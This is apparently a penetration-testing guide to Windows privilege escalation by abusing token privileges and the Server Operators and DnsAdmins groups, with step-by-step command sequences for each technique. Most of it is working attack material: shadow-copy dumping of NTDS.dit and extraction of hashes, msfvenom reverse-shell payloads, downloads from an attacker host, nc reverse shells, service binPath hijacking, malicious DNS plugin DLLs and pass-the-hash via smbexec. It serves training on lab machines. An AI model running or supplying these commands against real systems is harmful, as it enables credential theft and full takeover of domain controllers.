Windows Privilege Escalation
This comprehensive guide covers various methods to escalate privileges on Windows systems through leveraging dangerous privileges and group memberships. Understanding these escalation vectors is crucial for both defenders and security professionals.
Privileges
SeBackupPrivilege
Overview:
The SeBackupPrivilege allows a user to back up files and directories, regardless of their access permissions. This privilege is particularly dangerous when combined with the ability to bypass Normal Discretionary Access Control List (DACL) protections. An attacker with this privilege can read sensitive files like the NTDS.dit database and SYSTEM registry hive, which contain domain credentials and sensitive authentication material.
Key Insight:
While this privilege is intended for legitimate backup operations, it can be abused because:
- It allows reading files even if the user doesn’t have normal read permissions
- The NTDS.dit file contains all domain user password hashes
- The SYSTEM registry hive contains DPAPI keys and system secrets
- These two files together enable complete credential extraction from a Domain Controller
1 | *Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv |
Exploitation Method: Disk Shadow (VSS)
The DiskShadow technique exploits the Volume Shadow Copy Service (VSS) to create and expose shadow copies of the system volume. VSS is a Windows feature that maintains multiple versions of files by creating snapshots at specific points in time. When a shadow copy is created, it can be mounted as a separate drive, bypassing NTFS ACLs.
How it works:
- Create Shadow Copy: A persistent shadow copy of the C: drive is created
- Expose Shadow Copy: The shadow copy is exposed as a virtual drive (e.g., Z:)
- Bypass Protections: Since shadow copies don’t enforce modern ACLs, we can read protected files
- Extract Credentials: Copy NTDS.dit and SYSTEM registry files, then extract hashes offline
Technical Details:
- VSS was originally designed for legitimate backup purposes
- Shadow copies are typically protected by ACLs, but exposed copies have weaker protections
- The NTDS.dit file is locked while the Active Directory service is running, but we can copy it via VSS
- The SYSTEM registry contains the DPAPI master keys needed to decrypt sensitive data
Step-by-Step Process:
First, create a DiskShadow script file:
1 | set context persistent nowriters |
Upload the script to the target:
1 | *Evil-WinRM* PS C:\temp> upload pwn.txt |
Verify the script content:
1 | *Evil-WinRM* PS C:\temp> type pwn.txt |
Execute the DiskShadow script to create and expose the shadow copy:
1 | *Evil-WinRM* PS C:\temp> diskshadow /s pwn.txt |
Once the shadow copy is exposed as Z:, we can use robocopy with the /b (backup mode) flag to bypass access controls and copy the NTDS database:
1 | *Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit |
Export the SYSTEM registry hive, which contains decryption keys:
1 | *Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system |
Download both files to your attacking machine:
1 | *Evil-WinRM* PS C:\temp> download system |
1 | *Evil-WinRM* PS C:\temp> download ntds.dit |
Extract password hashes using Impacket’s secretsdump:
1 | secretsdump.py -system system -ntds ntds.dit local |
Why This Works:
- The
/bflag allows backup operators to read files regardless of NTFS ACL permissions - The NTDS.dit file cannot normally be copied while Active Directory is running due to file locks
- By copying from the shadow copy, we bypass both the file lock and ACL protections
- The extracted hashes can be used for pass-the-hash attacks or cracking
SeLoadDriverPrivilege
Overview:
The SeLoadDriverPrivilege allows a user to load and unload device drivers. Device drivers operate at the kernel level with unrestricted access to the entire system. An attacker with this privilege can load a malicious driver to execute arbitrary code with SYSTEM privileges, achieving complete system compromise.
Why It’s Dangerous:
- Drivers run with kernel-level privileges (more powerful than SYSTEM)
- No ASLR/DEP/code signing restrictions apply to loaded drivers
- A crafted driver can directly access hardware and modify system behavior
- Complete system compromise is possible
Reference: SeLoadDriverPrivilege Exploitation GitHub
Exploitation Steps:
Generate a reverse shell payload:
1 | msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o shell.exe |
Upload required exploitation tools:
1 | *Evil-WinRM* PS C:\temp> upload Capcom.sys |
Load the vulnerable Capcom driver:
1 | *Evil-WinRM* PS C:\temp> .\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\temp\Capcom.sys |
Exploit the driver vulnerability:
1 | *Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe LOAD \temp\Capcom.sys |
Execute the payload through the exploited driver:
1 | *Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe EXPLOIT .\shell.exe |
Technical Details:
- The Capcom driver (a legitimate driver from Capcom games) has a known vulnerability
- The vulnerability allows writing to arbitrary kernel memory
- This is used to modify system structures and bypass security features
- The shell executes with kernel privileges, equivalent to SYSTEM access
SeImpersonatePrivilege
Overview:
The SeImpersonatePrivilege allows a process to impersonate any user token, including the SYSTEM user. This privilege is commonly held by service accounts and allows an attacker to spawn processes with elevated privileges. When combined with token impersonation techniques like Potato exploits, this leads to immediate privilege escalation.
Why It’s Dangerous:
- Service accounts often need impersonation capabilities
- Processes running as NETWORK SERVICE or similar accounts typically have this privilege
- SYSTEM tokens are often available in memory due to system services
- Token impersonation doesn’t require authentication or user interaction
Check Privilege Status:
1 | C:\Windows\system32>whoami /priv |
Exploitation Using GodPotato:
Download GodPotato (a modern DCOM/RPC token impersonation exploit):
1 | PS C:\programdata> iwr http://<tun0>/GodPotato-NET4.exe -outfile gp.exe |
Execute with a reverse shell command:
1 | PS C:\programdata> .\gp.exe -cmd "C:\Users\Public\nc64.exe -e cmd.exe <tun0> <port>" |
Receive the elevated shell:
1 | nc -nlvp 443 |
How GodPotato Works:
- Leverages DCOM object instantiation with the RunAs mechanism
- Searches for a SYSTEM token in memory (from privileged processes)
- Uses RPC to create a named pipe and intercept authentication
- Performs token impersonation to assume SYSTEM privileges
- Executes the provided command with SYSTEM access
SeDebugPrivilege
Overview:
The SeDebugPrivilege allows a user to debug processes owned by other users, including SYSTEM. This privilege permits reading and modifying process memory, injecting code, and dumping credentials from memory. Combined with Metasploit, this directly enables SYSTEM privilege access.
Why It’s Dangerous:
- Permits attaching a debugger to any process
- Allows code injection into running processes
- Can extract sensitive data from process memory (credentials, tokens)
- Perfect for privilege escalation and post-exploitation
Exploitation Process:
Generate a Meterpreter reverse shell payload:
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f exe LHOST=<ip> LPORT=<port> -o shell.exe |
Download and execute the payload on the target:
1 | PS C:\temp> iwr http://<ip>/shell.exe -outfile shell.exe |
Set up the Metasploit handler to receive the connection:
1 | msf6 > use exploit/multi/handler |
Dump password hashes from memory:
1 | meterpreter > hashdump |
Set up port forwarding to access the target via SMB:
1 | meterpreter > portfwd add -L 127.0.0.1 -l 445 -p 445 -r <target_ip> |
Execute commands as Administrator using the dumped hashes:
1 | smbexec.py administrator@127.0.0.1 -hashes :<hash> |
Technical Details:
- Meterpreter provides access to Windows internals through its debugging API
hashdumpuses the Debugging privilege to extract credentials from the LSASS process- LSASS (Local Security Authority Subsystem Service) stores active authentication tokens
- SMB port forwarding enables lateral movement with administrator credentials
SeTcbPrivilege
Overview:
The SeTcbPrivilege (“Act as part of the operating system”) is one of the most dangerous privileges. It allows a user to act as the operating system itself, with the ability to perform virtually any system operation. This privilege can be abused to create a SYSTEM token and spawn processes with SYSTEM privileges.
Why It’s Dangerous:
- Represents OS-level capabilities
- Can bypass virtually all security restrictions
- Allows token manipulation and creation
- Direct path to unrestricted system access
Check Privilege Status:
1 | *Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv |
Exploitation Steps:
Download TcbElevation (exploit for this privilege):
1 | *Evil-WinRM* PS C:\Users\svc_deploy\Documents> iwr http://<tun0>/TcbElevation.exe -outfile TcbElevation.exe |
The next step uses rcat, a reverse shell tool. Reference: rcat GitHub
Upload the reverse shell binary:
1 | *Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload rcat_10.8.0.210_443.exe |
Execute the exploit to spawn a SYSTEM shell:
1 | *Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe pwn "C:\Windows\system32\cmd.exe /c C:\Users\svc_deploy\Documents\rcat_10.8.0.210_443.exe" |
Despite the error message, the shell is created. Catch the incoming connection:
1 | rlwrap nc -nlvp 443 |
Technical Details:
- TcbElevation creates a Windows service with the specified command
- The service runs as SYSTEM
- Even if the service creation partially fails, the command is often executed
- This is effective for one-time code execution with SYSTEM privileges
Group Memberships
Server Operators Group
Overview:
Members of the Server Operators group can sign in to servers, start and stop services, perform maintenance tasks like backup and restore, and critically, change binaries on domain controllers. This last capability is the key to escalation—members can modify critical system services.
Why It’s Dangerous:
- Can control service start/stop operations
- Can modify service executable paths (binPath)
- Can access domain controllers
- Legitimate operators often have this membership
Identifying Group Membership:
1 | *Evil-WinRM* PS C:\temp> net user svc-printer |
Exploitation Method: Service Binary Modification
Upload a reverse shell binary:
1 | *Evil-WinRM* PS C:\temp> upload nc64.exe |
Modify a non-critical service (like VMTools) to execute your reverse shell:
1 | *Evil-WinRM* PS C:\temp> sc.exe config VMTools binPath="C:\temp\nc64.exe -e powershell.exe <tun0> <port>" |
Stop the service:
1 | *Evil-WinRM* PS C:\temp> sc.exe stop VMTools |
Start the service, which now runs your reverse shell:
1 | *Evil-WinRM* PS C:\temp> sc.exe start VMTools |
Receive the SYSTEM shell on your listener:
1 | rlwrap nc -nlvp 9001 |
Why This Works:
- Server Operators can modify service configuration
- Services run as SYSTEM by default
- The service binary path is only checked when the service starts
- No integrity checks prevent malicious modifications
DnsAdmins Group
Overview:
Members of the DnsAdmins group on a Domain Controller have the ability to configure DNS server settings. Critically, they can specify a custom DLL file that the DNS service loads at startup. Since the DNS service runs as SYSTEM, loading a malicious DLL grants SYSTEM privileges.
Why It’s Dangerous:
- DNS service runs as SYSTEM
- DnsAdmins can configure which DLL the DNS service loads
- No signature verification on the DLL
- Complete system compromise through a legitimate group membership
Reference: DnsAdmins to System Compromise - Ired.team
Exploitation Steps:
Generate a reverse shell DLL:
1 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o shell.dll |
Upload the malicious DLL:
1 | *Evil-WinRM* PS C:\temp> upload shell.dll |
Configure the DNS service to load your DLL at startup:
1 | *Evil-WinRM* PS C:\temp> cmd /c 'dnscmd <DC> /config /serverlevelplugindll C:\temp\shell.dll' |
Stop the DNS service on the Domain Controller:
1 | *Evil-WinRM* PS C:\temp> sc.exe \\<DC> stop dns |
Start the DNS service, which loads your malicious DLL:
1 | *Evil-WinRM* PS C:\temp> sc.exe \\<DC> start dns |
Receive the reverse shell on your listener:
1 | rlwrap nc -nlvp 9001 |
Technical Details:
- DnsAdmins members can execute arbitrary commands on the DC through dnscmd
- The
serverlevelplugindllregistry key specifies a DLL the DNS service loads - DLL loading happens during service startup with no validation
- The DLL inherits the DNS service’s SYSTEM privileges
Resources
- Security Researchers on Privilege Escalation Techniques
- Windows Privilege Escalation - HackingArticles
- SeLoadDriverPrivilege Repository
- Access Tokens - HackTricks
- Privilege Escalation Using Tokens - HackTricks
- Token Privilege Abuse Discussion
- SeTcbPrivilege Exploitation
- HackTheBox Blackfield Writeup
- HackTheBox Resolute Writeup
- Windows Built-in Groups - TheHacker Recipes
- DnsAdmins Exploitation - Ired.team
Practice Machines
- Baby (Vulnlab)
- Blackfield (HackTheBox)
- Resolute (HackTheBox)
- Fuse (HackTheBox)
- POV (HackTheBox)
- Job (Vulnlab)
- Sidecar (Vulnlab)
